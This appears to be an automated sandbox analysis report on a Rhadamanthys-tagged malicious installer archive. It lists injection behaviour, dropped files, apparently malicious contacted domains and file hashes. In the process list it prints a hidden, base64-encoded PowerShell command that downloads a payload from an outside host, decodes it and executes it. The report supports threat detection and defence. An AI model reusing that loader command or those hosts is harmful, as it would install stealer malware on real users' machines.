Analysis Overview
SHA256
41578e9927574558d723c7680f303e145d0ec2fe7543fbbb2a9ec0bd7d82979d
Threat Level: Known bad
The file x32_x64_installer.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-27 16:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-27 16:03
Reported
2024-03-27 16:14
Platform
win10v2004-20240226-en
Max time kernel
538s
Max time network
452s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4860 created 2896 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4500 set thread context of 4860 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSID952.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e59d6e2.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI633A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8935.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID6B0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID82A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e59d6de.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID73C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID8A4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID903.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8A9F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEA2D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID9FF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6399.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI88A7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B4C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID77D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI64D2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDA3E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI62FA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8984.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID5F2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID661.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID6EF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e59d6de.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{0A6C4E0B-599B-45A1-852F-9E5AF85901A1} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI625C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI62AB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89C3.tmp | C:\Windows\system32\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Windows\system32\mspaint.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x32_x64_installer\password.jpg" /ForceBootstrapPaint3D
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp1_setup.zip\setup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 214AE9F4CD283C557065F69C378F3A47
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDAB9.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiDAB6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrDAB7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrDAB8.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYwB1AHIAbABoAHUAYgAuAG0AbwBuAHMAdABlAHIALwBuAGUAdwBkAHIAbwBwAC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA
C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1B751952A4EAAF48E6B7444CBFBA2ED9
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4860 -ip 4860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4860 -ip 4860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4860 -ip 4860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2200
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DE333F3D2EED06DA6DDB3E6CC4D79281
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0F00D09D91849E4E721713DA63586975
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.177.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | thecurl.monster | udp |
| US | 104.21.31.116:80 | thecurl.monster | tcp |
| US | 104.21.31.116:443 | thecurl.monster | tcp |
| US | 8.8.8.8:53 | 116.31.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 8.8.8.8:53 | 174.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.earth.li | udp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | 124.131.93.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | curlhub.monster | udp |
| US | 104.21.77.61:443 | curlhub.monster | tcp |
| US | 8.8.8.8:53 | 61.77.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 8.8.8.8:53 | 134.68.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkass.monster | udp |
| US | 172.67.129.199:443 | checkass.monster | tcp |
| US | 8.8.8.8:53 | 199.129.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/5096-0-0x000001BA8B160000-0x000001BA8B170000-memory.dmp
memory/5096-4-0x000001BA8B1A0000-0x000001BA8B1B0000-memory.dmp
memory/5096-11-0x000001BA93480000-0x000001BA93481000-memory.dmp
memory/5096-13-0x000001BA93500000-0x000001BA93501000-memory.dmp
memory/5096-15-0x000001BA93500000-0x000001BA93501000-memory.dmp
memory/5096-16-0x000001BA93590000-0x000001BA93591000-memory.dmp
memory/5096-17-0x000001BA93590000-0x000001BA93591000-memory.dmp
memory/5096-18-0x000001BA935A0000-0x000001BA935A1000-memory.dmp
memory/5096-19-0x000001BA935A0000-0x000001BA935A1000-memory.dmp
C:\Windows\Installer\MSID73C.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
| SHA512 | 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591 |
C:\Windows\Installer\MSIDA3E.tmp
| MD5 | fb4665320c9da54598321c59cc5ed623 |
| SHA1 | 89e87b3cc569edd26b5805244cfacb2f9c892bc7 |
| SHA256 | 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59 |
